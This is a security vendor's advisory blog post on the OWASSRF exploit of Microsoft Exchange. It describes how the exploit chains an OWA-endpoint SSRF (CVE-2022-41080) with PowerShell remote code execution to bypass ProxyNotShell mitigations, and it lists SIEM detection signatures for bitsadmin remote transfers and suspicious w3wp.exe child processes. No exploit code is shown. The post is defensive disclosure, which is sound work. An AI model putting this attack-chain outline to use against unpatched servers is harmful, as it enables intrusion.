EDR / MDRIdentify, contain, respond, and stop malicious activity on endpoints
SIEMCentralize threat visibility and analysis, backed by cutting-edge threat intelligence
Risk Assessment & Vulnerability ManagementIdentify unknown cyber risks and routinely scan for vulnerabilities
Identity ManagementSecure and streamline client access to devices and applications with strong authentication and SSO
Cloud App SecurityMonitor and manage security risk for SaaS apps
SASEZero trust secure access for users, locations, and devices
SOC ServicesProvide 24/7 threat monitoring and response backed by ConnectWise SOC experts
Policy ManagementCreate, deploy, and manage client security policies and profiles
Incident Response ServiceOn-tap cyber experts to address critical security incidents
Cybersecurity GlossaryGuide to the most common, important terms in the industry
New Exchange Exploits Exploited in the Wild
December 22, 2022 by Bryson Medlock
Microsoft Exchange has received a lot of attention over the past couple of years due to a number of remote code execution (RCE) vulnerabilities specifically targeting the way Microsoft’s Internet Information Services (IIS) proxies traffic to the Microsoft Exchange back end (here, here, here, and here). News came out this week regarding a new method of exploiting Exchange that will bypass Microsoft’s recommended mitigations for ProxyNotShell (CVE-2022-41040 and CVE-2022-41082). Specifically, this new exploit bypasses the URL rewrite mitigation guidance from Microsoft we shared back in September; however, the bypass is only for this mitigation and will not work if your systems are patched with November 8, 2022 patch KB5019758.
This latest exploit, dubbed OWASSRF, was disclosed earlier this week by CrowdStrike. The original ProxyNotShell vulnerability starts with CVE-2022-41040, a server-side request forger (SSRF) targeting Exchange’s Autodiscover endpoint, which would allow an attacker to access arbitrary URLs in the back end. Then an CVE-2022-41082, an authenticated RCE vulnerability in Exchange can be used to execute arbitrary PowerShell commands. The new method targets a previously undisclosed vulnerability in the Outlook Web Access (OWA) frontend endpoint, instead of the Autodiscover endpoint. The previous URL redirect mitigation guidance from Microsoft only applied to the Autodiscover endpoint.
Security Researcher Dray Agha discovered an attacker’s open repository earlier this month, downloaded their tools, and made them available for download via Twitter. A leaked Python script, “poc.py”, was included in the leaked tools and gives us insight into the related vulnerability. Based on the leaked tool, the latest exploit observed in the wild appears to be related to CVE-2022-41080 which was patched in November.
The CRU has been actively hunting based on the information available and will continue to do so. Many of the TTPs observed in this attack are not new and existing CRU detection signatures already exist for our partners that will detect related post-comp activity. Partners using the CW SIEM who are sending us logs from their Exchange servers will find the following detection signatures in the CRU Collection:
[CRU][Windows] Bitsadmin transfer from remote server
[CRU][Windows] Suspicious w3wp.exe running as parent to powershell or cmd that is running child command processes
We’ve also added the following new signature specifically for CVE-2022-41080:
[CRU][Filebeat] Potential CVE-2022-41080 Exchange Privilege Escalation Exploit